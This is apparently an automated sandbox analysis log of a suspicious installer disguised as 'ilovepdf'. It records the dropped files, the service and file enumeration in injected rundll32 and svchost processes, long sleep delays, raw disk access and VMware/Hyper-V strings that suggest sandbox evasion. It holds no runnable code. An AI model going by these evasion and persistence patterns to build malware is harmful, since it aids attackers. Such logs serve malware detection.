Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3384410 17_2_00000204F3384410
Source: C:\Windows\System32\svchost.exe TID: 6684 Thread sleep count: 717 > 30
Source: C:\Windows\System32\svchost.exe TID: 6684 Thread sleep time: -71700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6668 Thread sleep count: 1082 > 30
Source: C:\Windows\System32\svchost.exe TID: 6668 Thread sleep time: -14400000s >= -30000s
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification, 13_2_04EC5C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle, 13_2_04ECB9A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle, 13_2_04EC2F70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,Sleep,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle, 13_2_04ECB800
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle, 14_2_0000024B7D0EEE50
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle, 14_2_0000024B7D0E6010
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle, 14_2_0000024B7D0EEC00
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle, 16_2_0000012E17886010
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle, 16_2_0000012E1788EE50
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle, 16_2_0000012E1788EC00
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle, 17_2_00000204F339EC00
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle, 17_2_00000204F3396010
Source: C:\Windows\System32\svchost.exe Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle, 17_2_00000204F339EE50
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 3600000
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 717
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 1082
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3384410 17_2_00000204F3384410
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB3C30 13_2_04EB3C30
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-30MA7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ti.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\tt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\th.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW, 13_2_04EC4560
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp Binary or memory string: "@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000.ifo
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}#{6ead3d82-25ec-46bc-b7fd-c1f0df8f5037}
Source: svchost.exe, 00000026.00000002.827434902.0000025C96535000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWe>%SystemRoot%\system32\mswsock.dll<IdleSettings>
Source: svchost.exe, 00000010.00000003.500955879.0000012E19682000.00000004.00000001.sdmp Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
Source: svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWMSAFD Irda [IrDA]OleMainThreadWndClass
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmp, svchost.exe, 00000011.00000000.333907246.00000204F304E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000000.341000431.000001D91A429000.00000004.00000001.sdmp, svchost.exe, 00000018.00000000.359760415.000001DC51288000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.533385222.000001AFB9A82000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmp Binary or memory string: VMware, Inc.ed
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: svchost.exe, 00000015.00000002.812290749.000002F2C5013000.00000004.00000001.sdmp Binary or memory string: Allow inbound TCP port 636 traffic for vmicheartbeat
Source: svchost.exe, 0000001E.00000002.816717606.000001BE5C115000.00000004.00000001.sdmp Binary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrivalPU
Source: svchost.exe, 0000001E.00000002.807078645.000000220DAFA000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000001e9-90ce-806e6f6e6963}\
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 0000000D.00000002.415655644.000000000339A000.00000004.00000020.sdmp, svchost.exe, 0000000E.00000002.812356243.0000024B7CA36000.00000004.00000001.sdmp, svchost.exe, 00000013.00000000.337659687.000002334203F000.00000004.00000001.sdmp, svchost.exe, 00000015.00000000.344287290.000002F2C5029000.00000004.00000001.sdmp, svchost.exe, 00000016.00000000.348368674.00000222CA43F000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.813571849.0000028621678000.00000004.00000001.sdmp, svchost.exe, 00000019.00000000.364042683.000002216AA5A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.816000256.000002743903C000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000000.376788702.000001111A236000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000000.380313179.0000022F11A29000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.810844808.0000021C22429000.00000004.00000001.sdmp, svchost.exe, 00000022.00000003.572028015.00000202B1ABD000.00000004.00000001.sdmp, svchost.exe, 00000025.00000000.401740945.000001AFB9AA4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmp Binary or memory string: VMware7,1L
Source: svchost.exe, 0000001B.00000000.366941643.0000027439029000.00000004.00000001.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmp Binary or memory string: l\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000010.00000003.682254804.0000012E19614000.00000004.00000001.sdmpBinary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0 E4F221468}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmpBinary or memory string: VMware820ES
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000011.00000000.331175005.00000204F3067000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmpBinary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{7fccc86c-228a-40ad-8a58-f590af7bfdce}b}}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmpBinary or memory string: VMware8
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmpBinary or memory string: AASCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000&00A8
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmpBinary or memory string: VMware
Source: svchost.exe, 00000011.00000000.329876741.00000204EFA29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW}
Source: svchost.exe, 00000010.00000002.812470084.0000012E17623000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Windows\Installer\MSIFBC3.tmp Code function: 10_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,10_2_004AF91C
Source: C:\Windows\Installer\MSIFBC3.tmp Code function: 10_2_0040AEF4 FindFirstFileW,FindClose,10_2_0040AEF4
Source: C:\Windows\Installer\MSIFBC3.tmp Code function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,10_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_0040E6A0 FindFirstFileW,FindClose,11_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_0060BC10 FindFirstFileW,GetLastError,11_2_0060BC10
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,11_2_006B76A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,13_2_04EB4C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB56D0 FindFirstFileW,FindClose,13_2_04EB56D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_04EB4E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,13_2_04EB57F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EE97D9 FindFirstFileExA,13_2_04EE97D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,13_2_04EB42B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,13_2_04EB6A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,13_2_04EB53D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,13_2_04EC7390
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,14_2_0000024B7D0D5E30
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,14_2_0000024B7D0EAE60
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_0000024B7D0D57B0
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D49FF
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,14_2_0000024B7D0D7A20
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,14_2_0000024B7D0D4AE3
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,14_2_0000024B7D0D63F0
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D110478 FindFirstFileExA,14_2_0000024B7D110478
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D4B90
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,16_2_0000012E17874AE3
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,16_2_0000012E178749FF
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,16_2_0000012E17877A20
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_0000012E178757B0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E17875E30
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,16_2_0000012E1788AE60
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178B0478 FindFirstFileExA,16_2_0000012E178B0478
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,16_2_0000012E178763F0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,16_2_0000012E17874B90
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E19805CF4 FindFirstFileExA,16_2_0000012E19805CF4
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E19823D90
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,16_2_0000012E198EB2F0
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,17_2_00000204F3384B90
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,17_2_00000204F33863F0
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33C0478 FindFirstFileExA,17_2_00000204F33C0478
